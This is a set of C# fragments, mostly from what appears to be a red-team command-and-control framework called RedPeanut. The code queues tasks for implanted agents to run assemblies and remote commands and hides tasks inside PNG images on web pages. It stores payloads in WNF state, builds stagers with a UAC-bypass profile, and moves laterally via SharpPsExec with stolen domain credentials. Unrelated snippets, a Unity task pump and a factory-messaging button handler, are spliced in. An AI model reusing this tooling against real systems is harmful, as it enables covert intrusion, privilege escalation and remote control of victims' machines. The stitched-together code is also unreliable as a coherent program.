public static void RunAssembly(string resname, string type, string[] args, IAgentInstance agent)
{
if (agent != null)
{
ModuleConfig modconfig = new ModuleConfig
{
Assembly = ReadResourceFile(resname),
Method = "Execute",
Moduleclass = type,
Parameters = args.ToArray <string>()
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
Instanceid = RandomAString(10, new Random()),
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(task);
}
}
public static void RunStandardBase64(string assembly, string method, string type, string[] args, IAgentInstance agent)
{
if (agent != null)
{
StandardConfig modconfig = new StandardConfig
{
Assembly = assembly,
Method = method,
Moduleclass = type,
Parameters = args.ToArray <string>()
};
TaskMsg task = new TaskMsg
{
TaskType = "standard",
Instanceid = RandomAString(10, new Random()),
StandardTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(task);
}
}
public void RemoveCommand(IAgentInstance agent, TaskMsg task)
{
TaskMsg msg = commandqueue.GetValueOrDefault(agent.AgentId).ElementAt(commandqueue.GetValueOrDefault(agent.AgentId).IndexOf(task));
AddTaskResponse(msg.Instanceid, msg);
commandqueue.GetValueOrDefault(agent.AgentId).Remove(task);
}
public static TaskMsg GetTaskSMB(NamedPipeClientStream pipe)
{
byte[] messageBytes = ReadMessage(pipe);
byte[] line = Convert.FromBase64String(Encoding.Default.GetString(messageBytes));
//Console.WriteLine("[*] Received: {0}", Encoding.Default.GetString(line));
TaskMsg task = new TaskMsg();
try
{
task = new JavaScriptSerializer().Deserialize <TaskMsg>(Encoding.Default.GetString(line));
if (task.Chunked)
{
for (int i = 1; i < task.ChunkNumber; i++)
{
messageBytes = ReadMessage(pipe);
line = Convert.FromBase64String(Encoding.Default.GetString(messageBytes));
TaskMsg tmpmsg = new JavaScriptSerializer().Deserialize <TaskMsg>(Encoding.Default.GetString(line));
task.ModuleTask.Assembly += tmpmsg.ModuleTask.Assembly;
}
}
}
catch (Exception e)
{
Console.WriteLine("[*] Error: {0}", e.Message);
Console.WriteLine("[*] Error: {0}", e.StackTrace);
}
return(task);
}
public static TaskMsg GetTaskHttp(CookiedWebClient wc, byte[] aeskey, byte[] aesiv, string rpaddress, string targetclass, bool isCovered)
{
wc.UseDefaultCredentials = true;
wc.Proxy = WebRequest.DefaultWebProxy;
wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials;
string resp = wc.DownloadString(rpaddress);
if (!string.IsNullOrEmpty(resp))
{
if (isCovered)
{
string baseurl = rpaddress.Substring(0, rpaddress.LastIndexOf('/'));
resp = Encoding.Default.GetString(ImageLoader.ImageLoader.Load(baseurl, rpaddress, resp, wc, targetclass));
}
var line = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(resp), aeskey, aesiv);
TaskMsg task = null;
try
{
task = new JavaScriptSerializer().Deserialize <TaskMsg>(line);
//task = JsonConvert.DeserializeObject<TaskMsg>(line);
}
catch (Exception)
{
}
return(task);
}
else
{
return(null);
}
}
int ProcessTaskNodeData(TaskNode node)
{
if (node.processDataCallBack != null)
{
node.processDataCallBack(node.data);
}
if (node.releaseDataCallBack != null)
{
node.releaseDataCallBack(node.data);
}
TaskMsg taskMsg = node.msg;
switch (taskMsg)
{
case TaskMsg.TMSG_QUIT:
quitSem.Set();
return(1);
case TaskMsg.TMSG_PAUSE:
pauseSem.WaitOne();
pauseSem.Reset();
break;
}
return(0);
}
private void BtnServerSend_Click(object sender, RoutedEventArgs e)
{
TaskMsg heartMsg = new TaskMsg()
{
DEVICE_TYPE = "A",
//MESSAGE_TYPE = "heart",//
NO = "A1",
DATA = new TaskData()
{
MATERIEL_CODE = "EEEEEEE",
ORDER_NO = "123123",
WORKORDER_CODE = "A2S2D3F4F4"
},
time_stamp = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss")
};
string strMsg = JsonConvert.SerializeObject(heartMsg);
server.SendMessage(strMsg, txtRouteKey.Text);
ExecuteMsg execMsg = new ExecuteMsg()
{
DATA = new List <RltData>()
{
new RltData()
{
Bar_code = "d123"
}
},
DEVICE_TYPE = "E015",
NO = "E01501",
};
strMsg = JsonConvert.SerializeObject(execMsg);
server.SendMessage(strMsg, txtRouteKey.Text);
}
public static void LoadRP()
{
try
{
TaskMsg task = GetTaskWnf();
StringBuilder myb = new StringBuilder();
StringWriter sw = new StringWriter(myb);
TextWriter oldOut = Console.Out;
Console.SetOut(sw);
Console.SetError(sw);
string classname = task.ModuleTask.Moduleclass;
string assembly = task.ModuleTask.Assembly;
string method = task.ModuleTask.Method;
string[] paramsv = task.ModuleTask.Parameters;
RunAssembly(assembly, classname, method, new object[] { paramsv });
string output = myb.ToString();
Console.SetOut(oldOut);
Console.SetError(oldOut);
sw.Flush();
sw.Close();
Console.WriteLine(Convert.ToBase64String(Encoding.Default.GetBytes(output)));
Environment.Exit(0);
}
catch (Exception e)
{
Console.WriteLine("[x] error " + e.Message);
Console.WriteLine("[x] error " + e.StackTrace);
}
}
public TaskNode(
TaskCallBack processDataCallBack,
TaskCallBack releaseDataCallBack,
object taskData, TaskMsg msg = TaskMsg.TMSG_DATA)
{
this.processDataCallBack = processDataCallBack;
this.releaseDataCallBack = releaseDataCallBack;
this.data = taskData;
this.msg = msg;
}
private void Run()
{
if (!string.IsNullOrEmpty(pipename))
{
TaskMsg msg = new TaskMsg();
msg.Agentid = agent.AgentId;
msg.TaskType = "pivot";
agent.SendCommand(msg);
}
}
public static void RunAssemblyBase64(string assembly, string method, string type, string[] args, IAgentInstance agent, string tasktype = null, string destfilename = null)
{
if (tasktype != null)
{
FileDownloadConfig modconfig = new FileDownloadConfig
{
Assembly = assembly,
Method = method,
Moduleclass = type,
Parameters = args.ToArray <string>(),
FileNameDest = destfilename
};
TaskMsg task = new TaskMsg
{
TaskType = "download",
Instanceid = RandomAString(10, new Random()),
DownloadTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(task);
}
else
{
ModuleConfig modconfig = new ModuleConfig
{
Assembly = assembly,
Method = method,
Moduleclass = type,
Parameters = args.ToArray <string>()
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
Instanceid = RandomAString(10, new Random()),
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(task);
}
}
public static TaskMsg GetTaskWnf()
{
var casper = new byte[0];
TaskMsg task = new TaskMsg();
if (QueryWnf(Natives.WNF_XBOX_STORAGE_CHANGED).Data.Length > 0)
{
var p1_compressed = QueryWnf(Natives.PART_1).Data;
var p2_compressed = QueryWnf(Natives.PART_2).Data;
var p3_compressed = QueryWnf(Natives.PART_3).Data;
var p4_compressed = QueryWnf(Natives.PART_4).Data;
var part1 = DecompressDLL(p1_compressed);
var part2 = DecompressDLL(p2_compressed);
var part3 = DecompressDLL(p3_compressed);
var part4 = DecompressDLL(p4_compressed);
var s = new MemoryStream();
s.Write(part1, 0, part1.Length);
s.Write(part2, 0, part2.Length);
s.Write(part3, 0, part3.Length);
s.Write(part4, 0, part4.Length);
casper = s.ToArray();
byte[] line = DecompressDLL(Convert.FromBase64String(Encoding.Default.GetString(casper)));
try
{
task = new JavaScriptSerializer().Deserialize <TaskMsg>(Encoding.Default.GetString(line));
}
catch (Exception e)
{
Console.WriteLine("[*] Error: {0}", e.Message);
Console.WriteLine("[*] Error: {0}", e.StackTrace);
}
try
{
RemoveData();
}
catch (Exception e)
{
Console.WriteLine("[*] Error: {0}", e.Message);
Console.WriteLine("[*] Error: {0}", e.StackTrace);
}
}
return(task);
}
private string CreateTaskMgs(IAgentInstance agent, TaskMsg task)
{
AesManaged aes = agent.AesManager;
HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(Profileid);
string mesg;
if (profile.HtmlCovered)
{
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
string outputfolderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER);
string htmlsource = System.IO.File.ReadAllText(Path.Combine(folderrpath, HTML_TEMPLATE));
int elements = htmlsource.Split("targetclass").Length - 1;
if (elements <= 0)
{
return("");
}
string[] images = ListImages();
Random random = new Random();
int payloadindex = random.Next(1, elements);
//Create Image with task embedded
string taskmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
taskmsg = Convert.ToBase64String(EncryptAesMessage(taskmsg, aes));
string outputfilename = RandomAString(10, random) + ".png";
string outfullpath = Path.Combine(outputfolderrpath, outputfilename);
string imagepath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, IMAGELOAD_FOLDER, "images", images[payloadindex - 1]);
ImageGenerator.Create(Encoding.Default.GetBytes(taskmsg), imagepath, outfullpath);
//Add Image to resources
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(outputfilename, new WebResourceInstance(null, outputfilename));
//Create html page
htmlsource = Replacer.ReplaceHtmlProfile(htmlsource, profile.TargetClass, Encoding.Default.GetBytes(taskmsg).Length, outputfilename, elements, payloadindex, images);
return(htmlsource);
}
else
{
string tasknmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
mesg = Convert.ToBase64String(EncryptAesMessage(tasknmsg, aes));
return(mesg);
}
}
private void RunSetUnManaged()
{
TaskMsg msg = new TaskMsg
{
Instanceid = RandomAString(10, new Random()),
Agentid = agent.AgentId,
TaskType = "managed"
};
InjectionManaged injectionManagedTask = new InjectionManaged();
injectionManagedTask.Managed = false;
msg.InjectionManagedTask = injectionManagedTask;
agent.SendCommand(msg);
}
private void RunSetUnBlockDlls()
{
TaskMsg msg = new TaskMsg
{
Instanceid = RandomAString(10, new Random()),
Agentid = agent.AgentId,
TaskType = "blockdlls"
};
BlockDlls blockDllsTask = new BlockDlls();
blockDllsTask.Block = false;
msg.BlockDllsTask = blockDllsTask;
agent.SendCommand(msg);
}
public static TaskMsg GetTaskSMB(byte[] aeskey, byte[] aesiv, NamedPipeClientStream pipe)
{
var messageBytes = ReadMessage(pipe);
var line = Crypto.Aes.DecryptAesMessage(messageBytes, aeskey, aesiv);
//Console.WriteLine("[*] Received: {0}", line);
TaskMsg task = new TaskMsg();
try
{
task = new JavaScriptSerializer().Deserialize <TaskMsg>(line);
}
catch (Exception)
{
}
return(task);
}
public static void LoadRP()
{
string pipename = GetPipeName();
try
{
using (var pipe = new NamedPipeClientStream(".", pipename, PipeDirection.InOut))
{
pipe.Connect(5000);
pipe.ReadMode = PipeTransmissionMode.Message;
TaskMsg task = GetTaskSMB(pipe);
StringBuilder myb = new StringBuilder();
StringWriter sw = new StringWriter(myb);
TextWriter oldOut = Console.Out;
Console.SetOut(sw);
Console.SetError(sw);
string classname = task.ModuleTask.Moduleclass;
string assembly = task.ModuleTask.Assembly;
string method = task.ModuleTask.Method;
string[] paramsv = task.ModuleTask.Parameters;
RunAssembly(assembly, classname, method, new object[] { paramsv });
string output = myb.ToString();
Console.SetOut(oldOut);
Console.SetError(oldOut);
sw.Flush();
sw.Close();
Console.WriteLine(Convert.ToBase64String(Encoding.Default.GetBytes(output)));
Environment.Exit(0);
//SendOutputSMB(output, pipe);
}
}
catch (Exception e)
{
Console.WriteLine("[x] error " + e.Message);
Console.WriteLine("[x] error " + e.StackTrace);
}
}
private void RunRemote(string input)
{
string command = input;
CommandConfig cmdconfig = new CommandConfig
{
Command = command
};
TaskMsg task = new TaskMsg
{
TaskType = "command",
CommandTask = cmdconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(task);
}
public void AddCommand(IAgentInstance agent, TaskMsg task)
{
if (agent.Pivoter != null)
{
//Agent pivoted so command will be routed via pivoter
if (!commandqueue.ContainsKey(agent.Pivoter.AgentId))
{
commandqueue.Add(agent.Pivoter.AgentId, new List <TaskMsg>());
}
commandqueue.GetValueOrDefault(agent.Pivoter.AgentId).Add(task);
}
else
{
if (!commandqueue.ContainsKey(agent.AgentId))
{
commandqueue.Add(agent.AgentId, new List <TaskMsg>());
}
commandqueue.GetValueOrDefault(agent.AgentId).Add(task);
}
}
public ActionResult <string> Get()
{
//Call by agent to check if there is a task to execute
//need to check auth
try
{
string decriptedAgentid = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));
// Try to find Agent
IAgentInstance agent = RedPeanutC2.server.GetAgent(decriptedAgentid);
if (agent != null)
{
agent.lastseen = DateTime.Now;
TaskMsg msg = RedPeanutC2.server.GetCommand(agent);
if (msg != null)
{
string response = CreateTaskMgs(agent, msg);
RedPeanutC2.server.RemoveCommand(agent, msg);
Console.WriteLine("\n[*] Agent {0} tasked to run command...", agent.AgentId);
Program.GetMenuStack().Peek().RePrintCLI();
return(Ok(response));
}
else
{
return(Ok());
}
}
else
{
return(NotFound());
}
}
catch (HttpOperationException)
{
return(NotFound());
}
catch (Exception)
{
return(NotFound());
}
}
private ActionResult PostResponse(StreamReader reader, IAgentInstance agent)
{
ResponseMsg responsemsg = null;
try
{
Dictionary <string, string> args = GetParsedArgs(reader.ReadToEnd());
responsemsg = GetResponseMsg(args.GetValueOrDefault(Paramname), agent);
TaskMsg msg = RedPeanutC2.server.GetTaskResponse(responsemsg.TaskInstanceid);
Console.WriteLine("\n[*] Received response from agent {0}....", agent.AgentId);
if (msg.TaskType.Equals("download"))
{
byte[] bytefile = Utility.DecompressDLL(Convert.FromBase64String(responsemsg.Data));
string destfolder = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, DOWNLOADS_FOLDER, "downloaded_item_" + msg.DownloadTask.FileNameDest);
System.IO.File.WriteAllBytes(destfolder, bytefile);
Console.WriteLine("[*] File {0} downloaded", destfolder);
Program.GetMenuStack().Peek().RePrintCLI();
return(Ok(CreateOkMgs(agent)));
}
else
{
Console.WriteLine(responsemsg.Data);
Program.GetMenuStack().Peek().RePrintCLI();
return(Ok(CreateOkMgs(agent)));
}
}
catch (Exception e)
{
// Something goes wrong decrypting or deserializing message return not found
Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return {0}", e.Message);
Console.WriteLine("[x] {0}", e.StackTrace);
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
public ActionResult <string> Get()
{
//Call by agent to check if there is a task to execute
//need to check auth
try
{
string decriptedAgentid = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));
// Try to find Agent
IAgentInstance agent = RedPeanutC2.server.GetAgent(decriptedAgentid);
if (agent != null)
{
TaskMsg msg = RedPeanutC2.server.GetCommand(agent);
if (msg != null)
{
string response = CreateTaskMgs(agent, msg);
RedPeanutC2.server.RemoveCommand(agent, msg);
return(Ok(response));
}
else
{
Console.WriteLine("No command");
return(Ok());
}
}
else
{
return(NotFound());
}
}
catch (HttpOperationException)
{
return(NotFound());
}
catch (Exception)
{
return(NotFound());
}
}
public static void RunAssembly(string resname, string type, string[] args, IAgentInstance agent)
{
if (agent != null)
{
ModuleConfig modconfig = new ModuleConfig
{
Assembly = ReadResourceFile(resname),
Method = "Execute",
Moduleclass = type,
Parameters = args
};
if (agent.Managed)
{
modconfig.Assembly = ReadResourceFile(resname);
}
else
{
modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(
ReadResourceFile(resname), RandomAString(10, new Random()) + ".exe", type, "Execute", args)));
}
TaskMsg task = new TaskMsg
{
TaskType = "module",
Instanceid = RandomAString(10, new Random()),
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(task);
}
}
private void Run()
{
try
{
string host = ((AgentInstanceHttp)agent).GetAddress();
int port = ((AgentInstanceHttp)agent).GetPort();
int profileid = ((AgentInstanceHttp)agent).GetProfileid();
int targetframework = ((AgentInstanceHttp)agent).TargetFramework;
string pipename = "";
if (agent.Pivoter != null)
{
host = agent.Pivoter.SysInfo.Ip;
port = 0;
profileid = RedPeanutC2.server.GetDefaultProfile();
targetframework = agent.TargetFramework;
pipename = agent.AgentId;
}
else
{
host = ((AgentInstanceHttp)agent).GetAddress();
port = ((AgentInstanceHttp)agent).GetPort();
profileid = ((AgentInstanceHttp)agent).GetProfileid();
targetframework = agent.TargetFramework;
}
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
string source;
if (string.IsNullOrEmpty(pipename))
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", host, port, Program.GetC2Manager().GetC2Server().GetProfile(profileid), profileid);
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", host, pipename, Program.GetC2Manager().GetC2Server().GetProfile(profileid));
source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework)));
ModuleConfig modconfig = new ModuleConfig
{
Assembly = stagerstr,
Method = "Execute",
Moduleclass = "RedPeanutRP",
Parameters = new string[] { "pippo" }
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
source = File.ReadAllText(Path.Combine(folderrpath, SPAWN_TEMPLATE))
.Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLRWNF))
.Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profileid).Spawn)
.Replace("#SHELLCODE#", null)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#DOMAIN#", domain)
.Replace("#PROCESS#", null);
string spawnprocess = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", targetframework, compprofile: CompilationProfile.UACBypass)));
RunAssemblyBase64(
spawnprocess,
"RedPeanutSpawn",
new string[] { " " },
agent);
}
}
catch (Exception)
{
Console.WriteLine("[*] Errore generating task");
}
}
private void Run()
{
List <string> args = new List <string>();
if (username == null || password == null || domain == null || targethost == null || lhost == null || profile == 0 || (lport == 0 && lpipename == null))
{
return;
}
else
{
//Create stager stream gzip
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
{
string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
if (lpipename == null)
{
//Http no pivot stager
ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
else
{
//NamedPipe enable stager
ListenerPivotConfig conf = new ListenerPivotConfig("", lhost, lpipename, Program.GetC2Manager().GetC2Server().GetProfile(profile));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);
}
string stagerstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40)));
//Create TaskMsg gzip
if (agent != null)
{
ModuleConfig modconfig = new ModuleConfig
{
Assembly = stagerstr,
Method = "Execute",
Moduleclass = "RedPeanutRP",
Parameters = new string[] { "pippo" }
};
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
//Create Service stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SERVICE_TEMPLATE))
.Replace("#NUTCLR#", ReadResourceFile(PL_COMMAND_NUTCLR))
.Replace("#TASK#", Convert.ToBase64String(CompressGZipAssembly(Encoding.Default.GetBytes(JsonConvert.SerializeObject(task)))))
.Replace("#SPAWN#", Program.GetC2Manager().GetC2Server().GetProfile(profile).Spawn);
string servicestr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()), 40, "exe")));
//Create SharpPsExec stream gzip
source = File.ReadAllText(Path.Combine(folderrpath, SHARPSEXEC_TEMPLATE))
.Replace("#DOMAIN#", domain)
.Replace("#USERNAME#", username)
.Replace("#PASSWORD#", password)
.Replace("#HOSTANME#", targethost)
.Replace("#ASSEMBLY#", servicestr)
.Replace("#EXENAME#", (!string.IsNullOrEmpty(exename)) ? exename : RandomAString(10, new Random()) + ".exe")
.Replace("#SERVICEDISPLAYNAME#", (!string.IsNullOrEmpty(servdispname)) ? servdispname : RandomAString(10, new Random()))
.Replace("#SERVICEDESCRIPTION#", (!string.IsNullOrEmpty(servdescr)) ? servdescr : RandomAString(10, new Random()))
.Replace("#SERVICENAME#", (!string.IsNullOrEmpty(servname)) ? servname : RandomAString(10, new Random()));
string sharppsexecstr = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, RandomAString(10, new Random()) + ".dll", 40)));
RunAssemblyBase64(sharppsexecstr, "SharpPsExec.Program", new string[] { "pippo" }, agent);
}
}
}
}
public TaskMsg msg; //任务标志
public TaskNode(TaskMsg taskMsg)
{
msg = taskMsg;
}
//Send command to agent
//AES
public void SendCommand(TaskMsg task)
{
server.AddCommand(this, task);
}
public override int PostTask(TaskCallBack processDataCallBack, TaskCallBack releaseDataCallBack, object taskData, TaskMsg msg = TaskMsg.TMSG_DATA, int delay = 0)
{
if (unityUpdate.taskPump == null)
{
return(-1);
}
TaskNode taskNode = new TaskNode(processDataCallBack, releaseDataCallBack, taskData, msg);
return(unityUpdate.taskPump.PostTask(taskNode, delay));
}
public static void RunAssemblyBase64(string assembly, string method, string type, string[] args, IAgentInstance agent, string tasktype = null, string destfilename = null, string instanceid = null)
{
switch (tasktype)
{
case "download":
FileDownloadConfig downloadconfig = new FileDownloadConfig
{
Assembly = assembly,
Method = method,
Moduleclass = type,
Parameters = args.ToArray <string>(),
FileNameDest = destfilename
};
TaskMsg downloadtask = new TaskMsg
{
TaskType = "download",
DownloadTask = downloadconfig,
Agentid = agent.AgentId
};
if (instanceid == null)
{
downloadtask.Instanceid = RandomAString(10, new Random());
}
else
{
downloadtask.Instanceid = instanceid;
}
if (agent.Pivoter != null)
{
downloadtask.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(downloadtask);
break;
case "migrate":
ModuleConfig migrateconfig = new ModuleConfig
{
Assembly = assembly,
Method = method,
Moduleclass = type,
Parameters = args.ToArray <string>()
};
TaskMsg migratetask = new TaskMsg
{
TaskType = "migrate",
ModuleTask = migrateconfig,
Agentid = agent.AgentId
};
if (instanceid == null)
{
migratetask.Instanceid = RandomAString(10, new Random());
}
else
{
migratetask.Instanceid = instanceid;
}
if (agent.Pivoter != null)
{
migratetask.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(migratetask);
break;
default:
ModuleConfig modconfig = new ModuleConfig
{
Assembly = assembly,
Method = method,
Moduleclass = type,
Parameters = args.ToArray <string>()
};
if (agent.Managed)
{
modconfig.Assembly = assembly;
}
else
{
modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(
assembly, RandomAString(10, new Random()) + ".exe", type, method, args)));
}
TaskMsg task = new TaskMsg
{
TaskType = "module",
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (instanceid == null)
{
task.Instanceid = RandomAString(10, new Random());
}
else
{
task.Instanceid = instanceid;
}
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(task);
break;
}
}
public abstract int PostTask(TaskCallBack processDataCallBack, TaskCallBack releaseDataCallBack, object taskData, TaskMsg msg = TaskMsg.TMSG_DATA, int delay = 0);
